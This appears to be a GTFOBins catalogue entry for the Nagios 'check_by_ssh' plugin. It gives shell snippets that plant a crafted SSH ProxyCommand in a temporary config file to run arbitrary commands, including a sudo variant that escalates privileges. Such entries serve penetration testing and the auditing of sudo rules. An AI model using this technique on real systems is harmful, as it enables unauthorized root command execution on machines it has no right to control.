Files
GTFOBins.github.io/_gtfobins/check_by_ssh.md
2020-11-13 11:56:48 +01:00

572 B

description, functions
description functions
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
command sudo
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF check_by_ssh -F $TF -H localhost -C something cat $OUTPUT
code
COMMAND=id OUTPUT=output_file TF=$(mktemp) echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT